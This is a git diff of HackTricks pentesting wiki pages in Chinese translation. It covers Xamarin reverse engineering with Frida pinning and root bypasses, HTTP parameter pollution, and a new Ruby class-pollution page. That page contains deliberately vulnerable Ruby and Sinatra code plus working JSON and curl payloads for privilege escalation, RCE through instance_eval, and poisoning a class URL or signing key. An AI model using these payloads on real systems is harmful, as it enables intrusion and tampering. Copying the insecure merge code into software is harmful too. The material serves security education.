Translated ['mobile-pentesting/xamarin-apps.md', 'pentesting-web/deseria

SUMMARY.md

@@ -570,6 +570,7 @@
   * [Exploiting \_\_VIEWSTATE without knowing the secrets](pentesting-web/deserialization/exploiting-\_\_viewstate-parameter.md)
   * [Python Yaml Deserialization](pentesting-web/deserialization/python-yaml-deserialization.md)
   * [JNDI - Java Naming and Directory Interface & Log4Shell](pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md)
+  * [Ruby Class Pollution](pentesting-web/deserialization/ruby-class-pollution.md)
 * [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md)
 * [Email Injections](pentesting-web/email-injections.md)
 * [File Inclusion/Path traversal](pentesting-web/file-inclusion/README.md)

mobile-pentesting/xamarin-apps.md

@@ -1,8 +1,8 @@
 # Xamarin Apps
 
 {% hint style="success" %}
-学习与实践 AWS 黑客技术：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
-学习与实践 GCP 黑客技术：<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+学习与实践 AWS 黑客技术：<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
+学习与实践 GCP 黑客技术： <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
 
 <details>
 
@@ -15,31 +15,29 @@
 </details>
 {% endhint %}
 
-这是博客文章 [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers) 的摘要
-
 ## **基本信息**
 
-Xamarin 是一个 **开源平台**，旨在帮助开发人员使用 .NET 和 C# 框架 **构建 iOS、Android 和 Windows 应用**。该平台提供了众多工具和扩展，以高效创建现代应用程序。
+Xamarin 是一个 **开源平台**，旨在帮助开发者使用 .NET 和 C# 框架 **构建 iOS、Android 和 Windows 应用**。该平台提供了众多工具和扩展，以高效创建现代应用。
 
 ### Xamarin 的架构
 
-- 对于 **Android**，Xamarin 通过 .NET 绑定与 Android 和 Java 命名空间集成，在 Mono 执行环境中与 Android Runtime (ART) 一起运行。托管可调用包装器 (MCW) 和 Android 可调用包装器 (ACW) 促进 Mono 和 ART 之间的通信，二者均基于 Linux 内核构建。
-- 对于 **iOS**，应用程序在 Mono 运行时下运行，利用完整的提前编译 (AOT) 将 C# .NET 代码转换为 ARM 汇编语言。此过程与 UNIX 类内核上的 Objective-C 运行时一起运行。
+* 对于 **Android**，Xamarin 通过 .NET 绑定与 Android 和 Java 命名空间集成，在 Mono 执行环境中与 Android Runtime (ART) 一起运行。托管可调用包装器 (MCW) 和 Android 可调用包装器 (ACW) 促进了 Mono 和 ART 之间的通信，二者均基于 Linux 内核构建。
+* 对于 **iOS**，应用在 Mono 运行时下运行，利用完整的提前编译 (AOT) 将 C# .NET 代码转换为 ARM 汇编语言。此过程与 UNIX 类内核上的 Objective-C 运行时一起运行。
 
 ### .NET 运行时和 Mono 框架
 
-**.NET 框架** 包含用于应用程序开发的程序集、类和命名空间，.NET 运行时管理代码执行。它提供平台独立性和向后兼容性。**Mono 框架** 是 .NET 框架的开源版本，始于 2005 年，旨在将 .NET 扩展到 Linux，现在由 Microsoft 支持并由 Xamarin 主导。
+**.NET 框架** 包含用于应用开发的程序集、类和命名空间，.NET 运行时管理代码执行。它提供平台独立性和向后兼容性。**Mono 框架** 是 .NET 框架的开源版本，始于 2005 年，旨在将 .NET 扩展到 Linux，现在由 Microsoft 支持并由 Xamarin 主导。
 
 ### 反向工程 Xamarin 应用
 
 #### Xamarin 程序集的反编译
 
-反编译将编译后的代码转换回源代码。在 Windows 中，Visual Studio 的模块窗口可以识别可反编译的模块，允许直接访问第三方代码并提取源代码进行分析。
+反编译将编译后的代码转换回源代码。在 Windows 中，Visual Studio 的模块窗口可以识别可供反编译的模块，从而直接访问第三方代码并提取源代码进行分析。
 
 #### JIT 与 AOT 编译
 
-- **Android** 支持即时编译 (JIT) 和提前编译 (AOT)，并具有混合 AOT 模式以实现最佳执行速度。完整 AOT 仅限于企业许可证。
-- **iOS** 仅采用 AOT 编译，因为 Apple 对动态代码执行有严格限制。
+* **Android** 支持即时编译 (JIT) 和提前编译 (AOT)，并具有混合 AOT 模式以实现最佳执行速度。完整 AOT 仅限于企业许可证。
+* **iOS** 仅采用 AOT 编译，因为 Apple 对动态代码执行有严格限制。
 
 ### 从 APK/IPA 中提取 dll 文件
 
@@ -47,15 +45,21 @@ Xamarin 是一个 **开源平台**，旨在帮助开发人员使用 .NET 和 C#
 ```bash
 python3 xamarin-decompress.py -o /path/to/decompressed/apk
 ```
-对于Android中的assembly blobs，[pyxamstore](https://github.com/jakev/pyxamstore)可以解压它们。
+在反编译APK后，如果可以看到unknown/assemblies/文件夹及其中的`.dll`文件，则可以直接使用[**dnSpy**](https://github.com/dnSpy/dnSpy)对`.dll`进行分析。\
+然而，有时会在unknown/assemblies/文件夹中发现`assemblies.blob`和`assemblies.manifest`文件。可以使用工具[pyxamstore](https://github.com/jakev/pyxamstore)来解包Xamarin应用中的`assemblies.blob`文件，从而访问.NET程序集以进行进一步分析：
 ```bash
 pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
 ```
-iOS dll 文件可以轻松访问以进行反编译，揭示了应用程序代码的显著部分，这些代码通常在不同平台之间共享一个共同的基础。
+iOS dll 文件可以轻松获取以进行反编译，揭示应用程序代码的显著部分，这些代码通常在不同平台之间共享一个共同的基础。
+
+### 静态分析
+
+一旦获得 `.dll`，就可以使用 [**dnSpy**](https://github.com/dnSpy/dnSpy) **或** [**ILSpy**](https://github.com/icsharpcode/ILSpy) 等工具对 .Net 代码进行静态分析，这将允许修改应用程序的代码。这对于篡改应用程序以绕过保护措施非常有用。\
+请注意，在修改应用程序后，您需要将其重新打包并重新签名。
 
 ### 动态分析
 
-动态分析涉及检查 SSL 钉扎，并使用像 [Fridax](https://github.com/NorthwaveSecurity/fridax) 这样的工具对 Xamarin 应用中的 .NET 二进制文件进行运行时修改。Frida 脚本可用于绕过根检测或 SSL 钉扎，从而增强分析能力。
+动态分析涉及检查 SSL 钉扎，并使用 [Fridax](https://github.com/NorthwaveSecurity/fridax) 等工具对 Xamarin 应用中的 .NET 二进制文件进行运行时修改。Frida 脚本可用于绕过根检测或 SSL 钉扎，从而增强分析能力。
 
 其他有趣的 Frida 脚本：
 
@@ -63,22 +67,27 @@ iOS dll 文件可以轻松访问以进行反编译，揭示了应用程序代码
 * [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/)
 * [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin)
 
+### 重新签名
+
+工具 [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) 简化了使用相同密钥签名多个 APK 的过程，并可用于在对应用程序进行更改后重新签名。
 
 ## 进一步信息
+
 * [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
 * [https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/](https://thecobraden.com/posts/unpacking\_xamarin\_assembly\_stores/)
+* [https://medium.com/@justmobilesec/introduction-to-the-exploitation-of-xamarin-apps-fde4619a51bf](https://medium.com/@justmobilesec/introduction-to-the-exploitation-of-xamarin-apps-fde4619a51bf)
 
 {% hint style="success" %}
-学习与实践 AWS 黑客技术：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
-学习与实践 GCP 黑客技术：<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
 
 <details>
 
-<summary>支持 HackTricks</summary>
+<summary>Support HackTricks</summary>
 
-* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
-* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 {% endhint %}

pentesting-web/deserialization/ruby-class-pollution.md

@@ -0,0 +1,441 @@
+# Ruby Class Pollution
+
+{% hint style="success" %}
+学习与实践 AWS 黑客技术：<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
+学习与实践 GCP 黑客技术：<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>支持 HackTricks</summary>
+
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
+
+</details>
+{% endhint %}
+
+这是来自帖子 [https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html](https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html) 的摘要
+
+## 属性合并
+
+示例：
+```ruby
+# Code from https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html
+# Comments added to exploit the merge on attributes
+require 'json'
+
+
+# Base class for both Admin and Regular users
+class Person
+
+attr_accessor :name, :age, :details
+
+def initialize(name:, age:, details:)
+@name = name
+@age = age
+@details = details
+end
+
+# Method to merge additional data into the object
+def merge_with(additional)
+recursive_merge(self, additional)
+end
+
+# Authorize based on the `to_s` method result
+def authorize
+if to_s == "Admin"
+puts "Access granted: #{@name} is an admin."
+else
+puts "Access denied: #{@name} is not an admin."
+end
+end
+
+# Health check that executes all protected methods using `instance_eval`
+def health_check
+protected_methods().each do |method|
+instance_eval(method.to_s)
+end
+end
+
+private
+
+# VULNERABLE FUNCTION that can be abused to merge attributes
+def recursive_merge(original, additional, current_obj = original)
+additional.each do |key, value|
+
+if value.is_a?(Hash)
+if current_obj.respond_to?(key)
+next_obj = current_obj.public_send(key)
+recursive_merge(original, value, next_obj)
+else
+new_object = Object.new
+current_obj.instance_variable_set("@#{key}", new_object)
+current_obj.singleton_class.attr_accessor key
+end
+else
+current_obj.instance_variable_set("@#{key}", value)
+current_obj.singleton_class.attr_accessor key
+end
+end
+original
+end
+
+protected
+
+def check_cpu
+puts "CPU check passed."
+end
+
+def check_memory
+puts "Memory check passed."
+end
+end
+
+# Admin class inherits from Person
+class Admin < Person
+def initialize(name:, age:, details:)
+super(name: name, age: age, details: details)
+end
+
+def to_s
+"Admin"
+end
+end
+
+# Regular user class inherits from Person
+class User < Person
+def initialize(name:, age:, details:)
+super(name: name, age: age, details: details)
+end
+
+def to_s
+"User"
+end
+end
+
+class JSONMergerApp
+def self.run(json_input)
+additional_object = JSON.parse(json_input)
+
+# Instantiate a regular user
+user = User.new(
+name: "John Doe",
+age: 30,
+details: {
+"occupation" => "Engineer",
+"location" => {
+"city" => "Madrid",
+"country" => "Spain"
+}
+}
+)
+
+
+# Perform a recursive merge, which could override methods
+user.merge_with(additional_object)
+
+# Authorize the user (privilege escalation vulnerability)
+# ruby class_pollution.rb '{"to_s":"Admin","name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
+user.authorize
+
+# Execute health check (RCE vulnerability)
+# ruby class_pollution.rb '{"protected_methods":["puts 1"],"name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
+user.health_check
+
+end
+end
+
+if ARGV.length != 1
+puts "Usage: ruby class_pollution.rb 'JSON_STRING'"
+exit
+end
+
+json_input = ARGV[0]
+JSONMergerApp.run(json_input)
+```
+### 解释
+
+1. **权限提升**: `authorize` 方法检查 `to_s` 是否返回 "Admin." 通过 JSON 注入一个新的 `to_s` 属性，攻击者可以使 `to_s` 方法返回 "Admin"，从而获得未授权的权限。
+2. **远程代码执行**: 在 `health_check` 中，`instance_eval` 执行 `protected_methods` 中列出的方法。如果攻击者注入自定义方法名（如 `"puts 1"`），`instance_eval` 将执行它，导致 **远程代码执行 (RCE)**。
+   1. 这仅仅是因为存在一个 **脆弱的 `eval` 指令** 执行该属性的字符串值。
+3. **影响限制**: 该漏洞仅影响单个实例，其他 `User` 和 `Admin` 实例不受影响，从而限制了利用的范围。
+
+### 现实案例 <a href="#real-world-cases" id="real-world-cases"></a>
+
+### ActiveSupport 的 `deep_merge`
+
+默认情况下这并不脆弱，但可以通过类似的方式使其脆弱:&#x20;
+```ruby
+# Method to merge additional data into the object using ActiveSupport deep_merge
+def merge_with(other_object)
+merged_hash = to_h.deep_merge(other_object)
+
+merged_hash.each do |key, value|
+self.class.attr_accessor key
+instance_variable_set("@#{key}", value)
+end
+
+self
+end
+```
+### Hashie的 `deep_merge`
+
+Hashie的 `deep_merge` 方法直接作用于对象属性，而不是普通哈希。它**防止在合并中用属性替换方法**，但有一些**例外**：以 `_`、`!` 或 `?` 结尾的属性仍然可以合并到对象中。
+
+一个特殊情况是属性 **`_`** 本身。仅仅 `_` 是一个通常返回 `Mash` 对象的属性。由于它是**例外**的一部分，因此可以对其进行修改。
+
+查看以下示例，如何通过传递 `{"_": "Admin"}` 来绕过 `_.to_s == "Admin"`：
+```ruby
+require 'json'
+require 'hashie'
+
+# Base class for both Admin and Regular users
+class Person < Hashie::Mash
+
+# Method to merge additional data into the object using hashie
+def merge_with(other_object)
+deep_merge!(other_object)
+self
+end
+
+# Authorize based on to_s
+def authorize
+if _.to_s == "Admin"
+puts "Access granted: #{@name} is an admin."
+else
+puts "Access denied: #{@name} is not an admin."
+end
+end
+
+end
+
+# Admin class inherits from Person
+class Admin < Person
+def to_s
+"Admin"
+end
+end
+
+# Regular user class inherits from Person
+class User < Person
+def to_s
+"User"
+end
+end
+
+class JSONMergerApp
+def self.run(json_input)
+additional_object = JSON.parse(json_input)
+
+# Instantiate a regular user
+user = User.new({
+name: "John Doe",
+age: 30,
+details: {
+"occupation" => "Engineer",
+"location" => {
+"city" => "Madrid",
+"country" => "Spain"
+}
+}
+})
+
+# Perform a deep merge, which could override methods
+user.merge_with(additional_object)
+
+# Authorize the user (privilege escalation vulnerability)
+# Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
+# Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
+user.authorize
+end
+end
+
+if ARGV.length != 1
+puts "Usage: ruby hashie.rb 'JSON_STRING'"
+exit
+end
+
+json_input = ARGV[0]
+JSONMergerApp.run(json_input)
+```
+## Poison the Classes <a href="#escaping-the-object-to-poison-the-class" id="escaping-the-object-to-poison-the-class"></a>
+
+在以下示例中，可以找到类 **`Person`**，以及继承自 **`Person`** 类的类 **`Admin`** 和 **`Regular`**。它还有另一个名为 **`KeySigner`** 的类：
+```ruby
+require 'json'
+require 'sinatra/base'
+require 'net/http'
+
+# Base class for both Admin and Regular users
+class Person
+@@url = "http://default-url.com"
+
+attr_accessor :name, :age, :details
+
+def initialize(name:, age:, details:)
+@name = name
+@age = age
+@details = details
+end
+
+def self.url
+@@url
+end
+
+# Method to merge additional data into the object
+def merge_with(additional)
+recursive_merge(self, additional)
+end
+
+private
+
+# Recursive merge to modify instance variables
+def recursive_merge(original, additional, current_obj = original)
+additional.each do |key, value|
+if value.is_a?(Hash)
+if current_obj.respond_to?(key)
+next_obj = current_obj.public_send(key)
+recursive_merge(original, value, next_obj)
+else
+new_object = Object.new
+current_obj.instance_variable_set("@#{key}", new_object)
+current_obj.singleton_class.attr_accessor key
+end
+else
+current_obj.instance_variable_set("@#{key}", value)
+current_obj.singleton_class.attr_accessor key
+end
+end
+original
+end
+end
+
+class User < Person
+def initialize(name:, age:, details:)
+super(name: name, age: age, details: details)
+end
+end
+
+# A class created to simulate signing with a key, to be infected with the third gadget
+class KeySigner
+@@signing_key = "default-signing-key"
+
+def self.signing_key
+@@signing_key
+end
+
+def sign(signing_key, data)
+"#{data}-signed-with-#{signing_key}"
+end
+end
+
+class JSONMergerApp < Sinatra::Base
+# POST /merge - Infects class variables using JSON input
+post '/merge' do
+content_type :json
+json_input = JSON.parse(request.body.read)
+
+user = User.new(
+name: "John Doe",
+age: 30,
+details: {
+"occupation" => "Engineer",
+"location" => {
+"city" => "Madrid",
+"country" => "Spain"
+}
+}
+)
+
+user.merge_with(json_input)
+
+{ status: 'merged' }.to_json
+end
+
+# GET /launch-curl-command - Activates the first gadget
+get '/launch-curl-command' do
+content_type :json
+
+# This gadget makes an HTTP request to the URL stored in the User class
+if Person.respond_to?(:url)
+url = Person.url
+response = Net::HTTP.get_response(URI(url))
+{ status: 'HTTP request made', url: url, response_body: response.body }.to_json
+else
+{ status: 'Failed to access URL variable' }.to_json
+end
+end
+
+# Curl command to infect User class URL:
+# curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge
+
+# GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
+get '/sign_with_subclass_key' do
+content_type :json
+
+# This gadget signs data using the signing key stored in KeySigner class
+signer = KeySigner.new
+signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")
+
+{ status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json
+end
+
+# Curl command to infect KeySigner signing key (run in a loop until successful):
+# for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done
+
+# GET /check-infected-vars - Check if all variables have been infected
+get '/check-infected-vars' do
+content_type :json
+
+{
+user_url: Person.url,
+signing_key: KeySigner.signing_key
+}.to_json
+end
+
+run! if app_file == $0
+end
+```
+### 毒父类
+
+使用此有效负载：
+
+{% code overflow="wrap" %}
+```bash
+curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge
+```
+{% endcode %}
+
+可以修改父类 **`Person`** 的 **`@@url`** 属性的值。
+
+### **污染其他类**
+
+使用这个有效载荷：
+
+{% code overflow="wrap" %}
+```bash
+for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done
+```
+{% endcode %}
+
+可以通过暴力破解定义的类，并在某个时刻污染类 **`KeySigner`**，通过 `injected-signing-key` 修改 `signing_key` 的值。\
+
+## 参考文献
+
+* [https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html](https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html)
+
+{% hint style="success" %}
+学习和实践 AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
+学习和实践 GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>支持 HackTricks</summary>
+
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+
+</details>
+{% endhint %}

pentesting-web/parameter-pollution.md

@@ -1,8 +1,10 @@
 # 参数污染
 
+## 参数污染
+
 {% hint style="success" %}
-学习与实践 AWS 黑客技术：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
-学习与实践 GCP 黑客技术：<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+学习与实践 AWS 黑客技术：<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
+学习与实践 GCP 黑客技术： <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
 
 <details>
 
@@ -10,7 +12,7 @@
 
 * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
 * **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
-* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
 
 </details>
 {% endhint %}
@@ -19,66 +21,132 @@
 
 {% embed url="https://websec.nl/" %}
 
+## HTTP 参数污染 (HPP) 概述
 
-# HTTP 参数污染 (HPP) 概述
+HTTP 参数污染 (HPP) 是一种技术，攻击者通过操纵 HTTP 参数以意想不到的方式改变 Web 应用程序的行为。这种操纵是通过添加、修改或重复 HTTP 参数来实现的。这些操纵的效果对用户并不直接可见，但可以显著改变应用程序在服务器端的功能，并在客户端产生可观察的影响。
 
-HTTP 参数污染 (HPP) 是一种技术，攻击者通过操纵 HTTP 参数以意想不到的方式改变 Web 应用程序的行为。这种操纵是通过添加、修改或重复 HTTP 参数来实现的。这些操纵的效果对用户并不直接可见，但可以显著改变服务器端应用程序的功能，并在客户端产生可观察的影响。
-
-## HTTP 参数污染 (HPP) 示例
+### HTTP 参数污染 (HPP) 示例
 
 一个银行应用程序的交易 URL：
 
-- **原始 URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000`
+* **原始 URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000`
 
 通过插入一个额外的 `from` 参数：
 
-- **操纵后的 URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
+* **操纵后的 URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
 
-交易可能错误地从 `accountA` 收费到 `accountC`，展示了 HPP 操纵交易或其他功能（如密码重置、双因素认证设置或 API 密钥请求）的潜力。
+交易可能错误地从 `accountC` 而不是 `accountA` 收取，展示了 HPP 操纵交易或其他功能（如密码重置、2FA 设置或 API 密钥请求）的潜力。
 
-### **特定技术的参数解析**
+#### **特定技术的参数解析**
 
-- 参数的解析和优先级取决于底层 Web 技术，影响 HPP 的利用方式。
-- 像 [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) 这样的工具有助于识别这些技术及其解析行为。
+* 参数的解析和优先级取决于底层 Web 技术，影响 HPP 的利用方式。
+* 像 [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) 这样的工具有助于识别这些技术及其解析行为。
 
-## PHP 和 HPP 利用
+### PHP 和 HPP 利用
 
-**一次性密码 (OTP) 操作案例：**
+**OTP 操纵案例：**
 
-- **背景：** 一个需要一次性密码 (OTP) 的登录机制被利用。
-- **方法：** 通过使用 Burp Suite 等工具拦截 OTP 请求，攻击者在 HTTP 请求中重复了 `email` 参数。
-- **结果：** 本应发送到初始电子邮件的 OTP 被发送到操纵请求中指定的第二个电子邮件地址。这个缺陷允许通过绕过预期的安全措施获得未授权访问。
+* **背景：** 一个需要一次性密码 (OTP) 的登录机制被利用。
+* **方法：** 通过使用 Burp Suite 等工具拦截 OTP 请求，攻击者在 HTTP 请求中重复了 `email` 参数。
+* **结果：** 本应发送到初始电子邮件的 OTP，反而发送到了操纵请求中指定的第二个电子邮件地址。这个缺陷允许通过绕过预期的安全措施获得未授权访问。
 
 这个场景突显了应用程序后端的一个关键疏漏，该后端处理第一个 `email` 参数以生成 OTP，但使用最后一个进行发送。
 
 **API 密钥操纵案例：**
 
-- **场景：** 一个应用程序允许用户通过个人资料设置页面更新他们的 API 密钥。
-- **攻击向量：** 攻击者发现通过向 POST 请求附加一个额外的 `api_key` 参数，可以操纵 API 密钥更新功能的结果。
-- **技术：** 利用像 Burp Suite 这样的工具，攻击者构造一个包含两个 `api_key` 参数的请求：一个合法的和一个恶意的。服务器只处理最后一个出现的参数，将 API 密钥更新为攻击者提供的值。
-- **结果：** 攻击者控制了受害者的 API 功能，可能未经授权访问或修改私有数据。
+* **场景：** 一个应用程序允许用户通过个人资料设置页面更新其 API 密钥。
+* **攻击向量：** 攻击者发现通过向 POST 请求附加一个额外的 `api_key` 参数，可以操纵 API 密钥更新功能的结果。
+* **技术：** 利用像 Burp Suite 这样的工具，攻击者构造一个包含两个 `api_key` 参数的请求：一个合法的和一个恶意的。服务器只处理最后一个出现的参数，将 API 密钥更新为攻击者提供的值。
+* **结果：** 攻击者控制了受害者的 API 功能，可能未经授权访问或修改私有数据。
 
 这个例子进一步强调了安全参数处理的必要性，特别是在像 API 密钥管理这样关键的功能中。
 
-## 参数解析：Flask 与 PHP
+### 参数解析：Flask 与 PHP
 
 Web 技术处理重复 HTTP 参数的方式各不相同，影响其对 HPP 攻击的易受性：
 
-- **Flask：** 采用遇到的第一个参数值，例如在查询字符串 `a=1&a=2` 中，优先考虑初始实例而非后续重复。
-- **PHP（在 Apache HTTP 服务器上）：** 相反，优先考虑最后一个参数值，在给定示例中选择 `a=2`。这种行为可能无意中通过优先考虑攻击者操纵的参数而促进 HPP 利用。
+* **Flask：** 采用遇到的第一个参数值，例如在查询字符串 `a=1&a=2` 中优先考虑初始实例而非后续重复。
+* **PHP（在 Apache HTTP 服务器上）：** 相反，优先考虑最后一个参数值，在给定示例中选择 `a=2`。这种行为可能无意中通过优先考虑攻击者操纵的参数而促进 HPP 利用。
+
+## 按技术的参数污染
+
+结果来自 [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)
+
+### PHP 8.3.11 和 Apache 2.4.62 <a href="#id-9523" id="id-9523"></a>
+
+<figure><img src="../.gitbook/assets/image (1255).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*l_Pf2JNCYhmfAvfk7UTEbQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*l_Pf2JNCYhmfAvfk7UTEbQ.jpeg</a></p></figcaption></figure>
+
+1. 忽略参数名称中的 %00 之后的内容。
+2. 将 name\[] 视为数组。
+3. \_GET 不意味着 GET 方法。
+4. 优先考虑最后一个参数。
+
+### Ruby 3.3.5 和 WEBrick 1.8.2
+
